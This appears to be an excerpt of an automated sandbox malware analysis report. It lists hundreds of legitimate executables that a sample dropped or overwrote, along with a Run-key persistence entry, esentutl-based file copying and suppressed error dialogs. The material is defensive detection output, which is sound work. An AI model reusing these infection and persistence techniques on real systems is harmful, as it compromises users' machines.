                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\Locator.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Jwsmvmdw.PIFJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\wdmvmswJ.pifJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\Locator.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\vds.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

                Boot Survival

                barindex
                Drops PE files to the user root directory
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,30_2_1002CBD0
                Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JwsmvmdwJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JwsmvmdwJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_02B0AB1C
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
